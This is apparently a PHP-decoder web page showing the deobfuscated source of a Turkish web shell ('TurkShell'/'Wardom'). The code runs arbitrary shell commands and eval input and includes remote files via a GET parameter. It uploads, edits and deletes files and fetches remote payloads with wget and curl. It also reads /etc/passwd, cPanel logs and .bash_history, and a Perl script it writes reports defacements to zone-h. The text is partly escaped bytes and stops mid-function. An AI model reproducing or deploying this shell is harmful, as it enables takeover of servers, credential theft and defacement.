Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /* __________________________________________________ | Megabor -..
Decoded Output download
<?php
/* __________________________________________________
| Megabor - leetc0des.blogspot.com |
| on 2020-04-13 06:53:42 |
| GitHub: https://github.com/x-o-r-r-o |
|__________________________________________________|
*/
echo "\xef\273\xbf<?\xa/*###########################################
Shell\xaBu Shell kodlar\304\261n derlemesi Megabros taraf\xc4\261ndan yap\304\261lm\xc4\xb1\xc5\x9ft\xc4\xb1r..
Yap\304\261mc\304\261 Ve derleyeN : Megabros\xa###########################################*/
error_reporting(0);\xaset_magic_quotes_runtime(0);\xa\xaif(version_compare(phpversion(), '4.1.0') == -1)\xa {$_POST = &$HTTP_POST_VARS;$_GET = &$HTTP_GET_VARS;\xa $_SERVER = &$HTTP_SERVER_VARS;
}function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"];
if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}
elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;}\xaelse{return $requ."?".$link."=".$val;}}\xafunction delm($delmtxt){print"<center><table bgcolor=Maroon style='border:1px red ' width=99% height=2%>";print"<tr><td><b><center><font size=3 color=red >$delmtxt</td></tr></table></center>";}\xafunction callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd);\xa$nscmd=htmlspecialchars($scmd);print $nscmd;}\xaelseif(!function_exists(shell_exec)){exec($cmnd,$ecmd);
$ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;}
elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r");
while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));;
print $res;}pclose($pcmd);}elseif(!function_exists(popen)){\xaob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){
ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean();\xaprint htmlspecialchars($pret);}}
function input($type,$name,$value,$size)\xa{if (empty($value)){print "<input type=$type name=$name size=$size>";}\xaelseif(empty($name)&&empty($size)){print "<input type=$type value=$value >";}\xaelseif(empty($size)){print "<input type=$type name=$name value=$value >";}
else {print "<input type=$type name=$name value=$value size=$size >";}}\xafunction permcol($path){if (is_writable($path)){print "<font color=red>";\xacallperms($path); print "</font>";}\xaelseif (!is_readable($path)&&!is_writable($path)){print "<font color=red >";
callperms($path); print "</font>";}\xaelse {print "<font color=red >";callperms($path);}}\xaif ($dlink=="dwld"){download($_REQUEST['dwld']);}\xafunction download($dwfile) {$size = filesize($dwfile);
@header("Content-Type: application/force-download;name=$dwfile");
@header("Content-Transfer-Encoding: binary");\xa@header("Content-Length: $size");\xa@header("Content-Disposition: attachment; filename=$dwfile");\xa@header("Expires: 0");
@header("Cache-Control: no-cache, must-revalidate");
@header("Pragma: no-cache");\xa@readfile($dwfile); exit;}
?>\xa
<? include $_GET['baba']; ?>
<html>
<head><title>Wardom | Ne Mutlu T\xc3\xbcrk'\xc3\xbcm Diyene! | Edited By KingDefacer</title></head>
<style>\xaBODY { SCROLLBAR-BASE-COLOR: darkred ; SCROLLBAR-ARROW-COLOR: red; }\xaa{color:#FF0000;text-decoration:none;font-family:tahoma;font-size:13px}
a:hover{color:red}
input{FONT-WEIGHT:normal;background-color: #FFFFFF;font-size: 12px; color: #FF0000; font-family: Tahoma; border: 1px solid #666666;height:17}
textarea{background-color:#FFFFFF;color:#FF0000;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1 solid #FF0000;}\xadiv{font-size:12px;font-family:tahoma;font-weight:normal;color:red smoke}
select{background-color: #FFFFFF; font-size: 12px; color: #FF0000; font-family: Tahoma; border: 1 solid #666666;font-weight:bold;}</style>
<body bgcolor=DarkRed text=white ><font face="sans ms" size=3>\xa</body>\xa</html>\xa<?\xa$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();\xa\xa$sf="<form method=post>";$ef="</form>";\xa$st="<table style=\"border:1px #FF0000 solid \" width=100% height=100%>";
$et="</table>";$c1="<tr><td height=22% style=\"border:1px #FF0000 solid \">";
$c2="<tr><td style=\"border:1px #FF0000 solid \">";$ec="</tr></td>";\xa$sta="<textarea cols=157 rows=23>";$eta="</textarea>";\xa$sfnt="<font face=tahoma size=2 color=red >";$efnt="</font>";\xa################# Ending of common variables ########################
\xa//header table 1\xaprint"<table bgcolor=#191919 style=\"border:2px #FF0000 solid \" width=100% height=%>";print"<tr><td>"; print"<b>\xa<center><font face=Wingdings color=#FFFFFF size=7> Z</font><font face=tahoma color=red size=7> T\303\234RK <font face=tahoma color=white size=7> SHELL\xa</font></font> <font face=Wingdings color=red size=7> F</font><font face=Wingdings color=red size=8>N\xa</font></b></center>"; print"</td></tr>";print"</table>";print "<br>";
\xa//header table 2\xaprint"<table bgcolor=#191919 style=\"border:2px #FF0000 solid \" width=100% height=%>";print"<tr><td>"; print"<center><div><b>";\xa\xa//start header2 links
//home\xaprint "<a href=".inclink('dlink', 'home').">AnaSayfa</a>";
//go back
print " - <a href='javascript:history.back()'>Geri</a>";
//php info1\xaprint " - <a target='_blank' href=".inclink('dlink', 'phpinfo').">Php Bilgi</a>";
//phpinfo2
if ($dlink=='phpinfo'){print phpinfo();die();}
//base64 decode1\xaprint " - <a href=".inclink('dlink', 'basepw').">Base64 \xc3\x87\xc3\266z\xc3\274c\xc3\xbc</a>";
//url decode1\xaprint " - <a href=".inclink('dlink', 'urld').">Url Kod \xc3\x87\xc3\xb6z\303\xbcc\xc3\274</a>";\xa//url encode1\xaprint " - <a href=".inclink('dlink', 'urlen').">Url Kodlay\304\xb1c\304\xb1</a>";
//MD51\xaprint " - <a href=".inclink('dlink', 'mdf').">Md5</a>";\xa//permission check1\xaprint " - <a href=".inclink('dlink', 'perm')."&scdir=$nscdir>\304\260zinler</a>";\xa//show file source
print " - <a href=".inclink('dlink', 'showsrc')."&scdir=$nscdir>Dosya Kayna\xc4\x9f\304\261</a>";\xa//quick index1\xaprint " - <a href=".inclink('dlink', 'qindx')."&scdir=$nscdir>\304\xb0ndex Haz\xc4\xb1rla</a>";
//send mail\xaprint " - <a href=".inclink('dlink', 'mail')."&scdir=$nscdir>Mail</a>";
//Command helper
print " - <a href=".inclink('dlink', 'cmdhlp')."&scdir=$nscdir>Cmd Yard\304\261m</a>";\xa//end of links
//base64 decode2
if (isset ($_REQUEST['ncbase'])){\xa$cbase =(base64_decode ($_REQUEST['ncbase']));
print "<p>Result is : $sfnt".$cbase."$efnt"; die();}
if ($dlink=="basepw"){
print "<p><b>[ Base64 - \303\x87\xc3\xb6z\303\274c\xc3\xbc ]</b>";
print $sf;\xainput ("text","ncbase",$ncbase,35);print " ";\xainput ("submit","","\303\207\xc3\266z","");print $ef; die();}\xa
//url decode2
if (isset ($_REQUEST['nurld'])){
$urldc =(urldecode ($_REQUEST['nurld']));
print "<p>Result is : $sfnt".$urldc."$efnt"; die();}\xaif ($dlink=='urld'){\xaprint "<p><b>[ Url - \xc3\x87\xc3\xb6z\303\xbcc\xc3\274 ]</b>";\xaprint $sf;\xainput ("text","nurld",$nurld,35);print " ";
input ("submit","","\303\x87\303\266z","");print $ef; die();}\xa
//url encode2\xaif (isset ($_REQUEST['nurlen'])){\xa$urlenc =(urlencode (stripslashes($_REQUEST['nurlen'])));\xaprint "<p>Result is : $sfnt".$urlenc."$efnt"; die();}\xaif ($dlink=='urlen'){\xaprint "<p><b>[ Url - \305\236ifreleme ]</b>";\xaprint $sf;
input ("text","nurlen",$nurlen,35);print " ";\xainput ("submit","","\305\x9eifrele","");print $ef; die();}
//MD52
if (isset ($_REQUEST['nmdf'])){\xa$mdfe =(md5 ($_REQUEST['nmdf']));
print "<p>Result is : $sfnt".$mdfe."$efnt"; die();}\xaif ($dlink=='mdf'){
print "<p><b>[ MD5 - \305\x9eifreleme ]</b>";
print $sf;
input ("text","nmdf",$nmdf,35);print " ";\xainput ("hidden","scdir",$scdir,22);\xainput ("submit","","\xc5\236ifrele","");print $ef;die(); }\xa\xa//chk permission2
if ($dlink=='perm'){\xaprint $sf;input("submit","mfldr","Ana-Klas\xc3\266r","");print " ";
input("submit","sfldr","Alt-Klas\303\xb6r","");print $ef;\xa\xaprint "<pre>";\xaprint "<p><textarea cols=120 rows=12>";
if (isset($_REQUEST['mfldr'])){
callfuncs('find . -type d -perm -2 -ls');\xa}elseif (isset($_REQUEST['sfldr'])){\xacallfuncs('find ../ -type d -perm -2 -ls');
}print "</textarea>";print "</pre>";die();}
//show file sources
function callshsrc($showsc){
if(isset($showsc)&&filesize($showsc)=="0"){\xaprint "<p><b>[ Sorry, U choosed an empty file or the file not exists ]";die();}
elseif(isset($showsc)&&filesize($showsc) !=="0") {
print "<p><table width=100% height=10% bgcolor=#FF0000 border=1><tr><td>";\xaif (!show_source($showsc)||!function_exists('show_source')){print "<center><font color=white size=2><b>[ Sorry can't complete the operation ]</font></center>";die();}print "</td></tr></table>";die();}}if ($dlink=='showsrc'){\xaprint "<p><b>: TurkShell Php edit\303\266r\xc3\xbcyle istedi\304\237iniz bir php dosyas\304\261n\xc4\xb1 g\303\xb6r\xc3\xbcnt\xc3\xbcleyebilmek i\xc3\247in, dosya ad\xc4\xb1n\304\261 b\xc3\274t\xc3\274n dizinleriyle beraber yaz\xc4\xb1n\xc4\xb1z. :";print "<form method=get>";\xainput ("text","showsc","",35);print " ";
input ("hidden","scdir",$scdir,22);input ("submit","subshsc","G\xc3\xb6r\xc3\274nt\303\274le","");print $ef; die();}if(isset($_REQUEST['showsc'])){callshsrc(trim($_REQUEST['showsc']));}
if ($dlink=='cmdhlp'){\xaprint "<p><b>: Komutu A\xc5\237a\xc4\237\304\xb1ya Ekle ve Biz Ne \304\xb0\305\237e Yarad\xc4\261\xc4\x9f\xc4\261 Hakk\304\xb1nda Yard\xc4\xb1mc\304\xb1 Olal\xc4\xb1m :";print "<form method=get>";
input ("text","hlp","",35);print " ";\xainput ("submit","","Yard\304\261m","");print $ef; die();}\xaif (isset ($_REQUEST['hlp'])){$hlp=$_REQUEST['hlp'];\xaprint "<p><b>[ Yaz\304\261lan Komut: $sfnt".$hlp."$efnt ]";\xa$hlp = escapeshellcmd($hlp);print "<p><table width=100% height=30% bgcolor=#FF0000 border=2><tr><td>";\xaif (!function_exists(shell_exec)&&!function_exists(exec)&&\xa!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
{print "<center><font color=white size=2><b>[ Sorry can't complete the operation ]</font></center>";}else {print "<pre><font color=white>";\xaif(!callfuncs("man $hlp | col -b")){print "<center><font size=2><b>[ Bitti. ]";}print "</pre></font>";}print "</td></tr></table>";die();}\xaif (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt']))\xa{if (touch ($_REQUEST['indx'])==true){\xa$fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt']));
fclose($fp);print "<p>[ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]</p>";print "<b><center>[ <a href='javascript:history.back()'>Yeniden Editle</a>\xa] -- [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</center></b>";die(); }else {print "<p>[ Sorry, Can't create the index !! ]</p>";die();}}\xaif ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){\xaprint $sf."<br>";print "<p><textarea cols=50 rows=10 name=indxtxt>
\304\260ndex kodlar\xc4\xb1n\xc4\xb1 buraya yaz</textarea></p>";\xainput ("text","indx","\304\xb0ndex Ad\xc4\261",35);print " ";\xainput ("submit","qindsub","Olu\xc5\237tur","");print $ef;die();}\xaif (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){
$mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt'];\xaif (mail($mailto,$subj,$mailtxt)){print "<p>[ Mail sended to $sfnt".$mailto." $efnt successfully ]</p>"; die();}else {print "<p>[ Error, Can't send the mail ]</p>";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "<p>[ Error, Can't send the mail ]</p>";die();}\xaif ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){\xaprint $sf."<br>";print "<p><textarea cols=50 rows=10 name=mailtxt>
Mesaj\xc4\261n\304\xb1 buraya yaz</textarea></p>";input ("text","mailto","mail adresi",35);print " ";input ("text","subj","Ba\305\x9fl\xc4\xb1k",20);print " ";\xainput ("submit","mailsub","G\xc3\xb6nder","");print $ef;die();}\xaif (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);}
function callzone($nscdir){
if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";}
else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";}
fwrite ($fpz,"\$arq = @ARGV[0];
\$grupo = @ARGV[1];\xachomp \$grupo;\xaopen(a,\"<\$arq\");
@site = <a>;
close(a);\xa\$b = scalar(@site);\xafor(\$a=0;\$a<=\$b;\$a++)\xa{chomp \$site[\$a];\xaif(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; }\xaprint \"[+] Sending \$site[\$a]\n\";
use IO::Socket::INET;\xa\$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next;\xaprint \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\";
print \$sock \"Accept: */*\r\n\";
print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\";\xaprint \$sock \"Accept-Language: pt-br\r\n\";\xaprint \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\";
print \$sock \"Connection: Keep-Alive\r\n\";
print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\";
print \$sock \"Host: old.zone-h.org\r\n\";\xaprint \$sock \"Content-Length: 385\r\n\";\xaprint \$sock \"Pragma: no-cache\r\n\";
print \$sock \"\r\n\";
print \$sock \"notify_defacer=\$grupo¬ify_domain=http%3A%2F%2F\$site[\$a]¬ify_hackmode=22¬ify_reason=5¬ify=+OK+\r\n\";\xaclose(\$sock);}");\xaif (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']);\xa}else{print "<p>[ Can't complete the operation, try change the current dir with writable one ]<br>";}$zonet=$_REQUEST['zonet'];\xaif (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
{print "[ Can't complete the operation !! ]";}
else {callfuncs("chmod 777 $zpl;chmod 777 $li");\xaob_start();callfuncs("perl $zpl $li $zonet");ob_clean();
print "<p>[ All sites should be sended to zone-h.org successfully !! ]";die();}\xa}if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){\xaprint $sf."<br>";print "<p><pre><textarea cols=50 rows=10 name=zonetxt>\xawww.site1.com
www.site2.com\xa</textarea></pre></p>";input ("text","zonet","Hacker-name",35);print " ";\xainput ("submit","zonesub","Send","");print $ef;die();}\xaprint "</div></b></center>"; print"</td></tr>";print"</table>";print "<br>";\xafunction inisaf($iniv) { $chkini=ini_get($iniv);\xaif(($chkini || strtolower($chkini)) !=='on'){print"<font color=red ><b>Safe Mod Kapal\xc4\xb1 G\303\266z\xc3\xbck\303\xbcyor. Ancak Engelli Fonksiyonlar Bulunabilir.</b></font>";} else{
print"<font color=red><b>A\xc3\247\xc4\xb1k ( G\xc3\274venli )</b></font>";}}function inifunc($inif){$chkin=ini_get($inif);\xaif ($chkin==""){print " <font color=red><b>Yok</b></font>";}
else {$nchkin=wordwrap($chkin,40,"\n", 1);print "<b><font color=red >".$nchkin."</font></b>";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);}
elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r');\xawhile (!feof($opop)){ $nval= fgetc($opop);}}\xaelseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){
ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();}\xaif($nval=$owhich){print"<font color=red><b>ON</b></font>";}
else{print"<font color=red ><b>OFF</b></font>";} }\xaprint"<table bgcolor=#191919 style=\"border:2px #FF0000 solid ;font-size:13px;font-family:tahoma \" width=100% height=%>";
print"<tr><td>"; print"<center><br>";\xaprint"<b>Safe-mode :\t";print inisaf('safe_mode');print "</b>";print"</center>";
if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)||strstr(PHP_OS,"WIN")){print "";}else{print "<table bgcolor=#191919 width=100% height=% style='font-size:13px;font-family:tahoma'><tr><td>";
print "<div align=center>"; print"<br><b>Mysql : </b>";
callocmd('which mysql','/usr/bin/mysql');\xaprint"</td>"; print"<td>"; print"<br><b>Perl : </b>";
callocmd('which perl',('/usr/bin/perl')||'/usr/local/bin/perl');print"</td>"; print"<td>"; print"<br><b>Gcc : </b>";
callocmd('which gcc','/usr/bin/gcc'); print"</td>"; print"<td>";
print"<br><b>Curl : </b>"; callocmd('which curl','/usr/bin/curl'); print"</td>"; print"<td>"; print"<br><b>GET : </b>";\xacallocmd('which GET','/usr/bin/GET');\xaprint"</td>"; print"<td>";print"<br><b>Wget : </b>";\xacallocmd('which wget','/usr/bin/wget');\xaprint"</td>"; print"<td>"; print"<br><b>Lynx : </b>";
callocmd('which lynx','/usr/bin/lynx');\xaprint"</td>"; print "</tr></table>"; }print "<hr><br>";
print "<br><table style=\"border:2px #FF0000 solid \" width=100% height=%>"; print"<tr><td><font size=2 face=tahoma>";\xaprint "<b>IP Numaran\304\261z : ".$REMOTE_ADDR."<br></b>";\xaprint "<b>Server IP Numaras\304\261 : ".$SERVER_ADDR."</b>";\xaprint"<br><b>".$SERVER_SIGNATURE."</b>";\xaprint "<b>Server Ad\304\261 : ".$SERVER_NAME." / "."Email : ".$SERVER_ADMIN."<br></b>";\xaprint "<b>Engelli Fonksiyonlar : </b>";inifunc(disable_functions);print"<br>";\xaprint "<b>Kimsiniz : <b>"; callfuncs('id');print"<br><b>Os : </b>";\xaif (strstr( PHP_OS, "WIN")){print php_uname(); print " ";print PHP_OS; }else {
if (!function_exists(shell_exec)&&!function_exists(exec)&&\xa!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))\xa{print php_uname(); print "/";print PHP_OS;}\xaelse {callfuncs('uname -a');}}print"<br>";\xaprint"Php-versiyon : ".phpversion(); print"<br><b>Bulundu\304\237unuz Ana Dizin : </b>";
print $nscdir." [ ";permcol($nscdir);print " ]";
print"<br>";print "TurkShell Burada : " .__file__;
print"<br> Toplam Alan: "; readable_size(disk_total_space($nscdir));print " / ";
print"Bos Alan: "; readable_size(disk_free_space($nscdir));\xaprint "</center><br></font>"; print"</td></tr></table><br>";\xaif (isset($_REQUEST['credir'])) { $ndir=trim($_REQUEST['dir']);
if (mkdir( $ndir, 0777 )){ $mess=basename($ndir)." created successfully"; }\xaelse{$mess="Klas\303\xb6r Olu\xc5\x9ftur/Sil";}}elseif (isset($_REQUEST['deldir']))
{ $nrm=trim($_REQUEST['dir']);if (is_dir($nrm)&& rmdir($nrm)){$mess=basename($nrm)." deleted successfully"; }else{$mess="Create/Delete Dir";}}\xaelse{$mess="Klas\303\266r Olustur/Sil";}if(isset($_REQUEST['crefile'])){
$ncfile=trim($_REQUEST['cfile']);\xaif (!is_file($ncfile)&&touch($ncfile)){ $mess3=basename($ncfile)." created succefully";unset ($_REQUEST['cfile']);}\xaelse{ $mess3= "Dosya Olustur/Sil";}}\xaelseif(isset($_REQUEST['delfile'])){\xa$ndfile=trim($_REQUEST['cfile']);\xaif (unlink($ndfile)) {$mess3=basename($ndfile)." deleted succefully";}\xaelse {$mess3= "Dosya Olustur/Sil";}}\xaelse {$mess3="Dosya Olustur/Sil";}
class upload{ function upload($file,$tmp){\xa$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();if (isset($_REQUEST["up"])){ if (empty($upfile)){print "";}\xaif (@copy($tmp,$nscdir."/".$file)){
print "<div><center><b><font color=red > $file </font>dosyas\304\261 ba\305\237ar\304\xb1yla y\xc3\xbcklenmi\305\237tir.</b></center></div>"; }else{print "<center><b>: Error uploading<font color=red> $file </font>: </b></center>";} } } }\xa$obj=new upload($HTTP_POST_FILES['upfile']['name'],$HTTP_POST_FILES['upfile']['tmp_name']); if (isset ($_REQUEST['ustsub'])){
$ustname=trim ($_REQUEST['ustname']);ob_start();
if ($_REQUEST['ustools']='t1'){callfuncs('wget '.$ustname);}\xaif ($_REQUEST['ustools']='t2'){callfuncs('curl -o basename($ustname) $ustname');}\xaif ($_REQUEST['ustools']='t3'){callfuncs('lynx -source $ustname > basename($ustname)');}\xaif ($_REQUEST['ustools']='t9'){callfuncs('GET $ustname > basename($ustname)');}
if ($_REQUEST['ustools']='t4'){callfuncs('unzip '.$ustname);}
if ($_REQUEST['ustools']='t5'){callfuncs('tar -xvf '.$ustname);}\xaif ($_REQUEST['ustools']='t6'){callfuncs('tar -zxvf '.$ustname);}
if ($_REQUEST['ustools']='t7'){callfuncs('chmod 777 '.$ustname);}\xaif ($_REQUEST['ustools']='t8'){callfuncs('make '.$ustname);}ob_clean();}\xaif (!isset($_REQUEST['cmd'])&&!isset($_REQUEST['eval'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['edit'])&&!isset($_REQUEST['subqcmnds'])&&!isset ($_REQUEST['safefile'])&&!isset ($_REQUEST['inifile'])&&!isset($_REQUEST['bip'])&&
!isset($_REQUEST['rfiletxt'])){\xaif ($dh = dir($nscdir)){ while (true == ($filename =$dh->read())){
$files[] = $filename; sort($files);}print "<br>";
print"<center><table bgcolor=#2A2A2A style=\"border:1px solid white\" width=100% height=6% ></center>";
print "<tr><td width=43% style=\"border:1px solid white\">";\xaprint "<center><b>Dosyalar";print "</td>";
print "<td width=8% style=\"border:1px solid white\">";print "<center><b>Boyutlar";print "</td>";
print "<td width=3% style=\"border:1px solid white\">";print "<center><b>Yazma";print "</td>";\xaprint "<td width=3% style=\"border:1px solid white\">";print "<center><b>Okuma";print "</td>";
print "<td width=5% style=\"border:1px solid white\">";print "<center><b>T\xc3\274r";print "</td>";
print "<td width=5% style=\"border:1px solid white\">";print "<center><b>D\xc3\xbczenleme";print "</td>";\xaprint "<td width=5% style=\"border:1px solid white\">";print "<center><b>Adland\xc4\xb1rma";print "</td>";
print "<td width=6% style=\"border:1px solid white\">";print "<center><b>\xc4\xb0ndir";print "</td>";if(strstr(PHP_OS,"Linux")){
print "<td width=8% style=\"border:1px solid white\">";print "<center><b>Grup";print "</td>";}
print "<td width=8% style=\"border:1px solid white\">";print "<center><b>\xc4\xb0zinler";print "</td></tr>"; foreach ($files as $nfiles){
if (is_file("$nscdir/$nfiles")){ $scmess1=filesize("$nscdir/$nfiles");}
if (is_writable("$nscdir/$nfiles")){
$scmess2= "<center><font color=red >Evet";}else {$scmess2="<center><font color=red>Hayir";}if (is_readable("$nscdir/$nfiles")){\xa$scmess3= "<center><font color=red >Evet";}else {$scmess3= "<center><font color=red>Hayir";}if (is_dir("$nscdir/$nfiles")){$scmess4= "<font color=red><center>Klas\303\xb6r";}else{$scmess4= "<center><font color=red >Dosya";}
print"<tr><td style=\"border:1px solid white\">";
if (is_dir($nfiles)){print "<font face= tahoma size=2 color=red >[ $nfiles ]<br>";}else {print "<font face= tahoma size=2 color=#FF0000>$nfiles <br>";}\xaprint"</td>"; print "<td style=\"border:1px solid white\">";
print "<center><font face= tahoma size=2 color=#FF0000>";
if (is_dir("$nscdir/$nfiles")){print "<b>K</b>las\303\266r";}
elseif(is_file("$nscdir/$nfiles")){readable_size($scmess1);}else {print "---";}
print "</td>"; print "<td style=\"border:1px solid white\">";
print "<center><font face= tahoma size=2 >$scmess2"; print "</td>";\xaprint"<td style=\"border:1px solid white\">";
print "<center><font face= tahoma size=2 >$scmess3"; print "</td>";
print "<td style=\"border:1px solid white\">";
print "<center><font face= tahoma size=2 >$scmess4"; print"</td>";\xaprint "<td style=\"border:1px solid white\">";if(is_file("$nscdir/$nfiles")){\xaprint " <center><a href=".inclink('dlink', 'edit')."&edit=$nfiles&scdir=$nscdir>D\xc3\xbczenle</a>";}else {print "<center><font face=tahoma size=2 color=gray>D\xc3\xbczenle</center>";}print"</td>"; print "<td style=\"border:1px solid white\">";print " <center><a href=".inclink('dlink', 'ren')."&ren=$nfiles&scdir=$nscdir>Adlandir</a>";print"</td>";print "<td style=\"border:1px solid white\">";\xaif(is_file("$nscdir/$nfiles")){\xaprint " <center><a href=".inclink('dlink', 'dwld')."&dwld=$nfiles&scdir=$nscdir>indir</a>";}else {print "<center><font face=tahoma size=2 color=gray>indir</center>";}print"</td>"; if(strstr(PHP_OS,"Linux")){
print "<td style=\"border:1px solid white\">";\xaprint "<center><font face=tahoma size=2 color=#FF0000>";owgr($nfiles);\xaprint "</center>";print"</td>";}
print "<td style=\"border:1px solid red \">";print "<center><div>";\xapermcol("$nscdir/$nfiles");print "</div>";print"</td>"; print "</tr>";\xa}print "</table>";print "<br>";}else {print "<div><br><center><b>[ \304\xb0zin Verilmiyor. ]<p>";}}
elseif (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])||isset($_REQUEST['eval'])||isset($_REQUEST['subqcmnds'])){
if (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])){print "<div><b><center>[ Executed command ][$] : ".$_REQUEST['cmd']."</div></center>";}\xaprint "<pre><center>".$sta;\xaif (isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);callfuncs($cmd);}
elseif(isset($_REQUEST['eval'])){\xaob_start();eval(stripslashes(trim($_REQUEST['eval'])));
$ret = ob_get_contents();ob_clean();print htmlspecialchars($ret);}\xaelseif (isset($_REQUEST['subqcmnds'])){
if ($_REQUEST['uscmnds']=='op1'){callfuncs('ls -lia');}\xaif ($_REQUEST['uscmnds']=='op2'){callfuncs('cat /etc/passwd');}\xaif ($_REQUEST['uscmnds']=='op3'){callfuncs('cat /var/cpanel/accounting.log');}\xaif ($_REQUEST['uscmnds']=='op4'){callfuncs('ls /var/named');}\xaif ($_REQUEST['uscmnds']=='op11'){callfuncs('find ../ -type d -perm -2 -ls');}\xaif ($_REQUEST['uscmnds']=='op12'){callfuncs('find ./ -type d -perm -2 -ls');}\xaif ($_REQUEST['uscmnds']=='op5'){callfuncs('find ./ -name service.pwd ');}
if ($_REQUEST['uscmnds']=='op6'){callfuncs('find ./ -name config.php');}\xaif ($_REQUEST['uscmnds']=='op7'){callfuncs('find / -type f -name .bash_history');}
if ($_REQUEST['uscmnds']=='op8'){callfuncs('cat /etc/hosts');}\xaif ($_REQUEST['uscmnds']=='op9'){callfuncs('finger root');}\xaif ($_REQUEST['uscmnds']=='op10'){callfuncs('netstat -an | grep -i listen');}\xaif ($_REQUEST['uscmnds']=='op13'){callfuncs('cat /etc/services');}\xa}print $eta."</center></pre>";}
function rdread($nscdir,$sf,$ef){$rfile=trim($_REQUEST['rfile']);
if(is_readable($rfile)&&is_file($rfile)){\xa$fp=fopen ($rfile,"r");print"<center>";\xaprint "<div><b>[ Editing <font color=red >".basename($rfile)."</font> ] [<a href='javascript:history.back()'> Geri </a>] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div><br>";
print $sf."<textarea cols=157 rows=23 name=rfiletxt>";\xawhile (!feof($fp)){$lines = fgetc($fp);
$nlines=htmlspecialchars($lines);print $nlines;}\xafclose($fp);print "</textarea>";if (is_writable($rfile)){\xaprint "<center><input type=hidden value=$rfile name=hidrfile><input type=submit value='Kaydet' > <input type=reset value='Reset' ></center>".$ef;}else\xa{print "<div><b><center>[ Can't edit <font color=red >".basename($rfile)."</font> ]</center></b></div><br>";}print "</center><br>";}
elseif (!file_exists($_REQUEST['rfile'])||!is_readable($_REQUEST['rfile'])||$_REQUEST['rfile']=$nscdir){print "<div><b><center>[ Safe Mod kapal\xc4\xb1 oldu\xc4\237u halde, engelli fonksiyonlar bulundu\304\237undan dolay\304\261 iste\304\x9finize cevap verilememektedir. ]</center></b></div><br>";}}
function rdsave($nscdir){$hidrfile=trim($_REQUEST['hidrfile']);\xaif (is_writable($hidrfile)){$rffp=fopen ($hidrfile,"w+");\xa$rfiletxt=stripslashes($_REQUEST['rfiletxt']);\xafwrite ($rffp,$rfiletxt);print "<div><b><center>\xa[ <font color=red >".basename($hidrfile)."</font> Ba\305\x9far\xc4\xb1yla D\xc3\274zenlendi. ]
[<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='javascript:history.back()'> Edit again </a>]
</center></b></div><br>";fclose($rffp);}
else {print "<div><b><center>[ Can't save the file !! ] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='javascript:history.back()'> Back </a>]</center></b></div><br>";}}
if (isset ($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])){rdread($nscdir,$sf,$ef);}\xaelseif (isset($_REQUEST['rfiletxt'])){rdsave($nscdir);}\xafunction callperms($chkperms){
$perms = fileperms($chkperms);\xaif (($perms & 0xC000) == 0xC000) {\xa // Socket
$info = 's';
